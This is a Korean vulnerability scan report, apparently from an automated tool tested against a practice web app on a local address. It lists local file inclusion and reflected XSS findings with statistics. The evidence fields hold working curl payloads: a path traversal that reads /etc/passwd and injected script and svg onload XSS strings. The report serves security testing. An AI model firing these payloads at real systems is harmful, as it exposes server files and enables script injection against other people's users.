# 보안 진단 보고서
## 결과 요약
| 취약점 | 심각도 | 주요 엔드포인트 | 영향 | CVE |
|---|---|---|---|---|
| Centos Web Panel 0.9.8.480 - Local File Inclusion | High | http://192.168.64.2:9991/www/FileInclusion/pages/lvl2.php/admin/index.php, http://192.168.64.2:9991/www/FileInclusion/pages/lvl1.php/admin/index.php | Successful exploitation of this vulnerability allows an attacker to read sensiti... | cve-2018-18323 |
| Fuzzing Parameters - Cross-Site Scripting | Medium | http://192.168.64.2:9991/www/FileInclusion/pages/lvl2.php/, http://192.168.64.2:9991/www/XSS/XSS_level2.php/ 외 2개 | N/A | N/A |
| Django Debug Page - Cross-Site Scripting | Medium | http://192.168.64.2:9991/www/XSS/XSS_level1.php/create_user/ | Successful exploitation of this vulnerability could allow an attacker to execute... | cve-2017-12794 |

## 주요 취약점
# HIGH
## Centos Web Panel 0.9.8.480 - Local File Inclusion
- **End-Point**: http://192.168.64.2:9991/www/FileInclusion/pages/lvl2.php/admin/index.php, http://192.168.64.2:9991/www/FileInclusion/pages/lvl1.php/admin/index.php
- **영향**: Successful exploitation of this vulnerability allows an attacker to read sensitive files on the server.
- **설명**: Centos Web Panel version 0.9.8.480 suffers from local file inclusion vulnerabilities. Other vulnerabilities including cross-site scripting and remote code execution are also known to impact this version.
- **근거**: curl -X 'GET' -d '' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36' 'http://192.168.64.2:9991/www/FileInclusion/pages/lvl2.php/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd'
- **대응**: 
- **조치**: 

# MEDIUM
## Fuzzing Parameters - Cross-Site Scripting
- **End-Point**: http://192.168.64.2:9991/www/FileInclusion/pages/lvl2.php/, http://192.168.64.2:9991/www/XSS/XSS_level2.php/ 외 2개
- **영향**: N/A
- **설명**: Cross-site scripting was discovered via a search for reflected parameter values in the server response via GET-requests.
- **근거**: curl -X 'GET' -d '' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/3.6.15' 'http://192.168.64.2:9991/www/FileInclusion/pages/lvl2.php/?order_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order_id%27%29%3E&cookie=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cookie%27%29%3E&debug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-debug%27%29%3E&m=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-m%27%29%3E&dir=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dir%27%29%3E&new_role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new_role%27%29%3E&trashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trashed%27%29%3E&log=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-log%27%29%3E&excerpt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-excerpt%27%29%3E&settings-updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings-updated%27%29%3E&plugins=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugins%27%29%3E&modify=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-modify%27%29%3E&pwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pwd%27%29%3E&file=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file%27%29%3E'
- **대응**: 
- **조치**: 

## Django Debug Page - Cross-Site Scripting
- **End-Point**: http://192.168.64.2:9991/www/XSS/XSS_level1.php/create_user/
- **영향**: Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
- **설명**: Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. We detected that right circumstances (DEBUG=True) are present to allow a cross-site scripting attack.
- **근거**: curl -X 'GET' -d '' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0' 'http://192.168.64.2:9991/www/XSS/XSS_level1.php/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
- **대응**: 
- **조치**: 

## 통계
| 심각도 | 개수 | 비율 |
|---|---|---|
| High | 2 | 2.7% |
| Medium | 5 | 6.8% |
| Low | 67 | 90.5% |

| 카테고리 | 개수 |
|---|---|
| Unencrypted Channels | 20 |
| Clickjacking Protection | 10 |
| Content Security Policy Configuration | 10 |
| MIME Type Confusion | 10 |
| XSS | 7 |
| Reflected Cross Site Scripting | 6 |
| Command execution | 4 |
| Path Traversal | 3 |
| Cleartext Submission of Password | 2 |
| Information Disclosure - Full Path | 1 |

| 엔드포인트 | 개수 |
|---|---|
| /www/CommandExecution/CommandExec-1.php | 8 |
| /www/FileInclusion/pages/lvl1.php | 8 |
| /www/FileInclusion/pages/lvl2.php | 8 |
| /www/FileUpload/fileupload1.php | 8 |
| /www/CommandExecution/CommandExec-2.php | 6 |
| /www/SQL/sql1.php | 6 |
| /www/SQL/sql2.php | 6 |
| /www/XSS/XSS_level1.php | 6 |
| /www/XSS/XSS_level2.php | 6 |
| /www/FileUpload/fileupload2.php | 5 |